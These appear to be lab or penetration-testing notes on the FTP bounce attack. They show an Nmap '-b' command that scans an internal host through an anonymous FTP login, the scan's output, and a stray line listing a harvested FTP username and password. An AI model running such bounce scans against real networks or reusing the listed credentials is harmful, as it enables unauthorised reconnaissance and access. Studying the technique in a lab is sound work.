A FTP server can bounce its traffic to an internal host.
https://www.geeksforgeeks.org/what-is-ftp-bounce-attack/
The Nmap -b flag can be used to perform an FTP bounce attack:
nmap -Pn -v -n -p80 -b <anonymous:[email protected]> 172.17.0.2
Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to <ftp://anonymous:[email protected]:21>
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
Password:
[2121][ftp] host: 10.129.51.3 login: robin password: 7iz4rnckjsduza7